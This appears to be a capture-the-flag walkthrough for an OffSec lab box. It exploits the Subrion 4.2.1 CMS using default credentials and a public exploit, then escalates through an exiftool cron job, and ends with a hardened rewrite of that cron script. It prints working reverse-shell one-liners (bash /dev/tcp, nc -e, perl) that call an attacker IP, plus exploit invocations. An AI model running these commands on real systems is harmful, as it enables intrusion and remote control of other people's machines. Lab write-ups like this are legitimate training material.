Open WDavid404 opened 4 months ago
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
-- http-title: Did not follow redirect to http://exfiltrated.offsec/
sudo vi /etc/hosts --> add exfiltrated.offsec
see the source code of web page --> Subrion 4.2
and from the page (/panel), we can see the version is 4.2.1
Try admin/admin login to http://exfiltrated.offsec/panel --> succeed
searchsploit Subrion 4.2 --> 49876.py
Try python3 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
--> it works (Note: the URL must be '/panel/' --> '/panel' doesn't work)
Try reverse shell commands, referring to https://www.revshells.com/
bash -c 'bash -i >& /dev/tcp/192.168.45.192/4444 0>&1'
nc -e /bin/bash 192.168.45.192 4444
perl -e 'use Socket;$i="192.168.45.192";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
---> didn't work
Try 'perl no sh'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.45.192:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
--> it works.
upgrade the shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm-256color
cat /etc/crontab
-->
cat image-exif.sh -->
#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata
echo -ne "\\n metadata directory cleaned! \\n\\n"
IMAGES='/var/www/html/subrion/uploads'
META='/opt/metadata'
FILE=`openssl rand -hex 5`
LOGFILE="$META/$FILE"
echo -ne "\\n Processing EXIF metadata now... \\n\\n"
ls $IMAGES | grep "jpg" | while read filename;
do
exiftool "$IMAGES/$filename" >> $LOGFILE   # <--- important!!
done
echo -ne "\\n\\n Processing is finished! \\n\\n\\n"
The key point is the command: exiftool "$IMAGES/$filename" >> $LOGFILE
Search 'exiftool exploit' on Google
--> https://www.exploit-db.com/exploits/50911
sudo apt update
sudo apt install djvulibre-bin
python3 50911.py -s 192.168.45.192 4444
-->
Upload image.jpg to /var/www/html/subrion/uploads
www-data@exfiltrated:/var/www/html/subrion/uploads$ wget 192.168.45.192/image.jpg
Get a reverse shell from the target host
Key points:
python3 50911.py -s 192.168.45.192 4444
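A hardened take on the image-exif.sh cron job shown above, as an added example that is not part of the original write-up or the target's code: it refuses to run the metadata parser as root, skips symlinks and names that merely contain "jpg", and quotes every path. The function names and the EXIF_CMD override are assumptions made for illustration; the account the original job runs under is not shown on the page, so the example assumes a dedicated unprivileged one.

```shell
#!/bin/sh
# Added example, not the target's script: a hardened take on image-exif.sh.
# EXIF_CMD and the function names are assumptions made for illustration.
set -u

EXIF_CMD="${EXIF_CMD:-exiftool}"

# Succeeds only for a non-root UID: a metadata parser fed files from a
# web-writable directory should never run with root privileges.
uid_allowed() {
    [ "$1" -ne 0 ]
}

# Succeeds when $1 is a regular file (not a symlink) whose name ends in .jpg.
# The original `ls | grep "jpg"` also matched names such as "a.jpg.php".
is_candidate() {
    case "$1" in
        *.jpg) [ -f "$1" ] && [ ! -L "$1" ] ;;
        *) return 1 ;;
    esac
}

# Parse every candidate in directory $1 and append the output to a fresh,
# owner-only log file under directory $2. Prints the log path on success.
collect_metadata() {
    images=$1
    meta=$2
    uid_allowed "$(id -u)" || { echo "refusing to parse uploads as root" >&2; return 1; }
    umask 077
    log=$(mktemp "$meta/exif.XXXXXX") || return 1
    for f in "$images"/*.jpg; do
        is_candidate "$f" || continue
        # Quoted path; a failing parse is logged and does not abort the loop.
        "$EXIF_CMD" "$f" >>"$log" 2>&1 || echo "parse failed: $f" >>"$log"
    done
    printf '%s\n' "$log"
}

# Intended use (from a crontab entry for an unprivileged account):
#   collect_metadata /var/www/html/subrion/uploads /opt/metadata
```

Running the job under an unprivileged account limits what a parser bug can reach; keeping exiftool itself patched is still required.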